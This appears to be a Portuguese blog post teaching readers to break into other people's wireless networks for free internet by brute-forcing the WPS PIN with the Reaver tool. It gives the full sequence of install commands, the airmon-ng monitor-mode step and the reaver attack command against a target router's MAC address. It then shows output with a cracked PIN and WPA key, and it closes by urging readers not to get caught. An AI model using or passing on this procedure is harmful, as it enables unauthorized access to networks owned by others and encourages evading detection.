Queres net grátis mas é cada vez mais difícil arranjar uma rede wireless desprotegida? Já quase ninguém tem a rede protegida por WEP Key e o stkeys já não funciona com os routers mais recentes? Começas a ficar com medo de ter que começar a pagar por uma ligação à Internet? Não desanimes, chegou o milagre porque todos esperávamos.
Desde há já vários anos que todos os routers wireless para poderem ter o selo “WiFi Certified” têm que ter o protocolo WPS ativo por defeito. O WPS ou WiFi Protected Setup é um protocolo que simplifica a configuração da rede wireless entre o router e os clientes , sejam eles portáteis, smartphones ou outros equipamentos.
O grade problema do WPS é que foi desenhado com o objetivo principal de ser fácil de usar, descurando a segurança. O WPS permite que o utilizador configure o equipamento terminal, colocando apenas uma palavra passe com 8 caracteres numéricos. Posteriormente o router envia a WPA KEY para o equipamento cliente, sem que o utilizador saiba essa mesma key ou tenha que a introduzir.
Num mundo perfeito, esta palavra com 8 caracteres numéricos é temporária e o WPS apenas está ativo quando se prime um botão no router mas, num mundo gerido pela ganancia, em que os fabricantes recorrem a todos os meios ao seu alcance para reduzir custos, esta chave é estática e está impressa na parte de baixo do router.
É a pensar nestes fabricantes que surgiu uma aplicação, de nome “Reaver” que consegue atacar os router por força bruta e descobrir as chaves WPA, devolvendo a WPA Key no final do ataque. Apesar de ser um ataque por brute force, o reaver pode demorar no máximo 3 ou 4 dias consecutivos, demorando habitualmente muito menos que isso. Também ao contrário de outros ataques deste tipo, o reaver não é muito exigente ao nível do CPU, um netbook fraquinho consegue ser tão eficaz quanto o mais poderoso dos i7. Isto deve-se ao facto de se aproveitar das vulnerabilidades do protocolo ao invés de ir tentando todas as combinações possíveis para a chave WPA.
Vamos então por mãos à obra e começar a crackar umas chaves. Se tens mais que um neurónio no cérebro já deves ter percebido que esta é uma ferramenta que só funciona em Linux, portanto deixa de ser mariquinhas e instala o Linux no teu PC. O reaver funciona em qualquer distribuição Linux. Neste tutorial vamos usar o Ubuntu 10.10 de 64 bit.
Vamos partir do principio que já tens o Ubuntu instalado no PC e que, apesar de não ser fundamental, também já tens o Kismet instalado e configurado para a tua placa wireless.
Todos os comandos são corridos como ROOT para facilitar a sua execução. Esta não é a forma mais segura de trabalhar e não deve ser usada como norma. A forma ideal será usar o prefixo "sudo" antes de cada comando que necessite privilégios de root e apenas não é usado aqui porque algumas das aplicações, como é o caso do kismet, não funciona desta forma.
- Abre uma janela de Terminal, e muda para o utilizador ROOT com o comando “su -”, seguido da password de ROOT.
-Instala os pré requisitos para o reaver:
apt-get install aircrack-ng
apt-get install python-pycryptopp
apt-get install python-scapy
apt-get install libpcap-dev
-Faz download da versão mais recente do reaver para a diretoria “/root”.
-Descomprime a aplicação com o comando “tar zxvf reaver-1.4.tar.gz”.
-Abre a diretoria reaver-1.4 com o comando “cd reaver-1.4”.
- Abre a diretoria source com o comado “cd src”.
-Configura e compila o rever com o comando “./configure && make && sudo make install”.
Agora que já tens o reaver instalado, chegou a altura de passar à ação.
Usa o kismet ou outra qualquer aplicação do género para identificares a rede wireless a atacar e o MAC ADDRESS do router alvo.
Vê o tutorial crackar MAC Filtering para obteres ajuda na configuração e utilização dos kismet.
-Depois de teres copiado o MAC ADDRESS do router podes sair do kismet e colocar a tua placa wireless em modo monitor com o comando “airmon-ng start wlan0”. A tua placa de rede pode ter um nome diferente da minha (wlan0), deves ter este facto em atenção.
-Vamos agora ao ultimo passo que é por o reaver a crackar o WPS, executando o comando “reaver -i mon0 -b 00:1B:FC:78:51:96 -vv”.
Verifica se o reaver consegue identificar o router e começar a efetuar as tentativas. Routers com chave WPS variável, como os da Apple ou com botão para ativar o WPS não são vulneráveis a este ataque e o reaver não consegue iniciar o ataque.
Depois de iniciado o ataque, o reaver vai mostrando o progresso em forma de percentagem. Atenção que este processo pode demorar vários dias. Se for necessário podes parar o reaver, desligar o PC e, mais tarde, continuar o processo a partir do ponto onde tinhas parado. Quando o ataque estiver completo, o reaver devolve-te a chave WPA ou WEP da rede onde estás a tentar entrar:
[+] Sending WSC NACK
[+] Pin cracked in 79293 seconds
[+] WPS PIN: '15789723'
[+] WPA PSK: 'C5609569627D8EEA3334FE3D4C4CD2054EF3A6EE47FCCE5A9E51961177489854'
[+] AP SSID: 'default'
Agora é só pegar na chave e configurar a rede wireless.
Quem é amiguinho, quem é?
The end.
E lembrem-se, não se deixem apanhar.
Sem comentários:
Enviar um comentário